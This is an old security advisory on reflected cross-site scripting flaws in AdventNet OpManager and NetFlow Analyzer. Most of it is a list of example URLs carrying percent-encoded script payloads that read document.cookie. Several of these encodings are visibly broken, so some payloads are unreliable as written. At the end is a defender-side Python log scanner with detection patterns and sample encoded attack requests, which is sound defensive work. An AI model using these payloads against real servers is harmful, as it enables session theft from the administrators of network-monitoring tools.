netflow-xss.txt

2007-07-07T00:00:00
ID PACKETSTORM:57502
Type packetstorm
Reporter Lostmon
Modified 2007-07-07T00:00:00

Description

                                        
                                            `###################################################  
NetFlow Analyzer 5 & OpManager 7 multiple XSS  
vendor url:http://www.adventnet.com/  
advisory:http://lostmon.blogspot.com/2007/07/netflow-analizer-5-opmanager-7-multiple.html  
vendor notify:yes exploits include:yes  
###################################################  
  
NetFlow Analyzer and OpManager contain a flaw that allows  
a remote cross-site scripting attack. This flaw exists  
because the application does not validate multiple parameters  
upon submission to multiple scripts. This could allow a user  
to create a specially crafted URL that would execute  
arbitrary code in a user's browser within the trust  
relationship between the browser and the server,  
leading to a loss of integrity.  
  
  
  
#####################  
Versions affected:  
#####################  
  
OpManager 7  
OpManager 6  
  
NetFlow Analyzer 5  
  
Other versions can be vulnerable too.  
  
  
###################  
Solution:  
###################  
  
No solution was available at this time !!!  
  
  
  
  
##################  
Time Line  
##################  
  
Discovered:20-05-2007  
vendor notify:02-07-2007  
vendor response:----  
disclosure:4-07-2007  
  
###################  
Examples  
###################  
  
To exploit some of the flaws you need to be logged in.  
  
  
#####################  
OpManager  
#####################  
  
  
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%F%  
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E62%  
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3  
E%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/devices/Search.do?searchTerm=sss%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%F%  
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selectedTab=Map  
  
http://localhost:8080/reports/ReportViewAction.do?selected  
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN  
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E  
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%  
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6  
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20  
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%  
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6  
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69  
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di  
splayName=webclient.reports.servers.memutil  
  
http://localhost:8080/reports/ReportViewAction.do?selectedT  
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam  
e=Utilization_Report&displayName=webclient.reports.servers.  
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%  
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F  
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7  
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%  
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21  
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6  
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%  
69%70%74%3E%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/reports/ReportViewAction.do?selectedT  
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%  
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22  
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7  
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%  
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E  
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6  
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%  
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62  
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc  
lient.reports.servers.cpuutil  
  
  
http://localhost:8080/admin/ServiceConfiguration.do?operati  
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7  
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%  
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E  
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2  
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%  
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72  
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2  
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte  
r&serviceName=Alerter  
  
http://localhost:8080/admin/DeviceAssociation.do?selectedNo  
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6  
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%  
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D  
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3  
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%  
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63  
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7  
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa  
me=com.adventnet.me.opmanager.webclient.admin.association.N  
TServiceAssociation  
  
  
http://localhost:8080/admin/DeviceAssociation.do?selectedTa  
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%  
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F  
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7  
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%  
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21  
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6  
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%  
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf  
igurations  
  
http://localhost:8080/admin/DeviceAssociation.do?selectedTa  
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F  
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6  
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%  
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73  
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5  
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%  
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E  
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6  
F%64%79%3E  
  
  
#######################  
NetFlow Analyzer  
#######################  
  
http://localhost:8080/netflow/jspui/applicationList.jsp?alph  
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68  
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E  
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F  
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C  
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70  
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D  
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E  
%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif  
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7  
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6  
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6  
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2  
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3  
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6  
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3  
C%2F%62%6F%64%79%3E&appID=62  
  
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=  
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%  
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%  
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%  
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%  
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%  
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%  
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%  
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos  
  
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g  
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%  
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%  
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%  
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%  
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%  
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%  
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%  
3E%3C%2F%62%6F%64%79%3E&grDisp=1  
  
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g  
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6  
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E  
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%  
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2  
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E  
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%  
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2  
F%62%6F%64%79%3E  
  
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl  
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%  
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62  
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2  
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%  
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73  
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2  
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%  
64%79%3E&period=hourly&customOption=true&firstTime=true  
  
#################### €nd ################################  
  
Thnx to estrella for being my light.  
Thnx to all Lostmon Team !!!  
  
--  
Sincerely:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
  
--  
Curiosity is what moves the mind....  
`
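
A defender-side check for the requests listed under "Examples", added here as an example (it is not part of the original advisory or of the vendor's code). The example URLs percent-encode every character of the injected markup, so a log search for a literal `<script` misses them; this script decodes each query parameter until it is stable before matching. The Common Log Format, the client addresses and the shortened encoded values in the sample are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a Common Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Decoded markup that has no place in these parameters: a quote that closes
# an attribute followed by '>', or the start of an HTML tag.
MARKUP = re.compile(r"""["']\s*>|</?[a-zA-Z!]""")


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable, so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return (line_no, path, parameter, decoded_value) for flagged requests."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # parse_qsl performs the first decoding pass; fully_decode does the rest.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            decoded = fully_decode(value)
            if MARKUP.search(decoded):
                hits.append((line_no, target.path, name, decoded))
    return hits


# Constructed sample: two ordinary requests, one single-encoded and one
# double-encoded attribute breakout against endpoints named in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2007:10:00:01 +0000] "GET /map/ping.do?name=192.168.1.2 HTTP/1.1" 200 512
10.0.0.9 - - [07/Jul/2007:10:00:07 +0000] "GET /map/ping.do?name=192.168.1.2%22%3E%3C%68%31%3E HTTP/1.1" 200 640
10.0.0.5 - - [07/Jul/2007:10:01:13 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=Todos%20los%20grupos HTTP/1.1" 200 2048
10.0.0.9 - - [07/Jul/2007:10:02:40 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups%2522%253E%253Ch1%253E&grDisp=1 HTTP/1.1" 200 2100
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A hit only shows that markup was submitted in a parameter; whether it was reflected unescaped still has to be confirmed against the response.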